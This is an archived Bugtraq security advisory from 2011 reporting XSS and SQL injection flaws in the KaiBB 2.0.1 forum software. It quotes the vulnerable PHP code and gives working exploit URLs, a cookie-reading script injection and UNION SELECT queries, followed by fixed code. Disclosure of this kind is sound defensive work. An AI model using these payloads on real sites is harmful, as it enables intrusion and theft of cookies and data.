| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-Id: <201110091057.p99Av38u011925@sf01web1.securityfocus.com>
Date: Sun, 9 Oct 2011 10:57:03 GMT
From: sschurtz@...nline.de
To: bugtraq@...urityfocus.com
Subject: KaiBB 2.0.1 XSS and SQL Injection vulnerabilities
Advisory: KaiBB 2.0.1 XSS and SQL Injection vulnerabilities
Advisory ID: SSCHADV2011-027
Author: Stefan Schurtz
Affected Software: Successfully tested on KaiBB 2.0.1
Vendor URL: http://code.google.com/p/kaibb/
Vendor Status: informed
CVE-ID: -
==========================
Vulnerability Description
==========================
KaiBB 2.0.1 is prone to XSS and SQL Injection vulnerabilities
==================
Technical Details
==================
# sql injection vul code in 'kaibb/rss.php'
if ( isset($_GET['forum']))
{
$id = $secure->clean($_GET['forum']);
$doGet = $db->query("SELECT * FROM " . $prefix . "_topics WHERE forum_id = '".$_GET['forum']."' ORDER BY id DESC LIMIT 15");
} else {
$doGet = $db->query("SELECT * FROM " . $prefix . "_topics ORDER BY id DESC LIMIT 15");
}
# inc/function.php
class secure {
function clean($content) {
$content = mysql_real_escape_string(htmlspecialchars($content));
return $content;
}
# xss vul code in 'inc/header.php'
$session_location = $_SERVER['REQUEST_URI'];
==================
Exploit
==================
Cross-site Scripting
http://<target>/kaibb/?'</script><script>alert(document.cookie)</script>
http://<target>/kaibb/index.php?'</script><script>alert(document.cookie)</script>
SQL Injection
http://<target>/kaibb/rss.php?forum=' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL AND 'a'='a
http://<target>/kaibb/rss.php?forum=' UNION ALL SELECT NULL, version(), NULL, NULL, NULL, NULL, NULL AND 'a'='a
http://<target>/kaibb/rss.php?forum=' UNION ALL SELECT NULL, user(), NULL, NULL, NULL, NULL, NULL AND 'a'='a
=========
Solution
=========
# solution for the sql injection
if ( isset($_GET['forum']))
{
$id = $secure->clean($_GET['forum']);
//$doGet = $db->query("SELECT * FROM " . $prefix . "_topics WHERE forum_id = '".$_GET['forum']."' ORDER BY id DESC LIMIT 15");
$doGet = $db->query("SELECT * FROM " . $prefix . "_topics WHERE forum_id = '". $id ."' ORDER BY id DESC LIMIT 15");
} else {
$doGet = $db->query("SELECT * FROM " . $prefix . "_topics ORDER BY id DESC LIMIT 15");
}
# solution for the xss vulnerability
//$session_location = $_SERVER['REQUEST_URI'];
$session_location = $_SERVER['SCRIPT_NAME'];
or
$session_location = htmlspecialchars($_SERVER['REQUEST_URI'],ENT_QUOTES);
====================
Disclosure Timeline
====================
08-Oct-2011 - informed developers
08-Oct-2011 - release date of this security advisory
09-Oct-2011 - Post on BugTraq
========
Credits
========
Vulnerability found and advisory written by Stefan Schurtz.
===========
References
===========
http://code.google.com/p/kaibb/
http://code.google.com/p/kaibb/issues/detail?id=2
http://www.rul3z.de/advisories/SSCHADV2011-027.txt
Powered by blists - more mailing lists